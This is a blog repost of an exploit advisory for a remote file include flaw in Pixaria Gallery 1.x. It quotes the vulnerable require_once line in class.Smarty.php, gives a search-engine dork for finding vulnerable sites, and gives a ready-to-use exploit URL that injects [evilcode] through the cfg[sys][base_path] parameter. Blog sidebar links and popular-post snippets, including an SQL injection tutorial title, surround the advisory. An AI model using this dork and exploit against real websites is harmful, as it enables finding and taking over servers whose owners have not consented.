Pixaria Gallery v1.x.x (class.Smarty.php) Remote File Include Vulnerability
---------------------------------------------
# scripts : Pixaria Gallery v1.x.x
# Discovered By : irvian
# scripts site : http://pixaria.com
# dork : inurl:index.gallery.php?gid=
----------------------------------------------
bug found:
/resources/includes/class.Smarty.php
// Load the main Smarty class
require_once ($cfg['sys']['base_path'] . "resources/smarty/libs/Smarty.class.php");
Exploit:
/resources/includes/class.Smarty.php?cfg[sys][base_path]=[evilcode]
26 February 2008
Pixaria Gallery 1.x RFI
Subscribe to:
Post Comments (Atom)
Search
Labels
- ebook (1)
- etc (13)
- Hacking (29)
- Linux/Nix (33)
- networking (6)
- phone (1)
- programing (9)
Links
Popular Posts
-
How the Pentagon's payroll quagmire traps soldiers HACKER NEWS | MAY 24, 2013 http://pulse.me/s/nzd6P By Scot J. Paltrow a...
-
SQL Injection Mencari tabel dan kolom di target mysql. Catatan cara ini dapat berhasil jika versi mysql 5 keatas dan information_schema dapa...
-
I was set up Ubuntu 9.10 karmic koala server as Squid box. Squid has been installed and work very well, then bridge 2 NIC and configure squi...
-
Uprek setting putty untuk connect ke remote desktop (RDP) server melalui SSH tunnel. 1) Open putty, terus ke SSH , Tunnels 2) Masukan Source...
-
@inj3ct0r: [remote exploits] - Ultra Mini HTTPD 1.21 - Stack Buffer Overflow Vulnerability http://t.co/j1nWphfSbh http://twitter.com/inj3ct0...
0 komentar:
Post a Comment